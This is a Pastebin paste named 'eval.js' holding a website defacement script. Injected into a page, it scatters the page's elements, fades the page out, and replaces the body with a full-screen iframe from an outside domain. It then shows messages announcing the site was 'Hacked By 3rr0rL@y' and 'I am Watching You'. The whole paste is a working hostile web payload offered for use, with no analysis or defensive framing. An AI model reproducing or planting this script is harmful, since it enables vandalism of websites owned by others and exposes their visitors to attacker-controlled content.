Advertisement
unknowns-mm

eval.js

Jul 25th, 2016
57
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.16 KB | None | 0 0
  1. sM=0; R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;
  2. DI=document.querySelectorAll("body *"); DIL=DI.length; dB = document.body; dBs = dB.style; sT=setTimeout;
  3. function A(){ if (sM) return; for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5) * 0.1 +"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5) * 0.1 +"px"}R++}setInterval('A()',50); void(0);
  4. function fI(el, len, callback) {el.style.display = ''; var opac = 0; var timer = setInterval(function () { if(el && el.id && el.id == 'overlay' && el.style.opacity >= 0.9) {clearInterval(timer); return;} if (opac >= 1){ clearInterval(timer); if (callback) { callback(); return; }; } el.style.opacity = opac.toFixed(1); opac += 0.1; }, len); return this; }
  5. function fO(el, len, callback) {var opac = 1; var timer = setInterval(function () { if (opac <= 0){ clearInterval(timer); el.style.display = 'none'; if (callback) { callback() }; } el.style.opacity = opac.toFixed(1); opac -= 0.03; }, len); return this; }
  6. dBs.overflowX = 'hidden'; dBs.overflowY = 'hidden';
  7. function shM(s) { document.getElementById('msg').innerHTML = s; }
  8. function showStatic() { dB.innerHTML = "<iframe src='http://www.30sec.co.in/ght.html' id='overlay' style='position: absolute; top: 0px; left: 0px; width: 100%; height: 100%; border: 0; margin: 0; background:#000000; '><div id='msg' style='margin: 0 auto; text-align: center; margin-top: 140px; font-size: 16px; font-family: monospace; color: white;'></div></div>"; dBs.positionLeft = 0; dBs.positionTop = 0; dBs.marginLeft = 0; dBs.marginTop = 0; dBs.opacity = 0; fI(dB, 100, function() { shMs(); }); fI(document.getElementById('overlay'), 100, function() { document.getElementById('overlay').style.opacity = 0.9; }); }
  9. function shMs() { sT(function() { shM("Nice To Meet You Admin....") }, 500); sT(function() { shM("Your Site Got Hacked By 3rr0rL@y....") }, 2000); sT(function() { shM("Dear Admin, Fixed Your Security...") }, 4000); sT(function() { shM("I am Watching You ....") }, 6000); sT(function() { DB.setup("<H1>./GHT</H1>"); window.location.reload(); }, 7500); }
  10. sT(function() { fO(dB, 51, function() { sM=1; showStatic() } ); }, 4000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement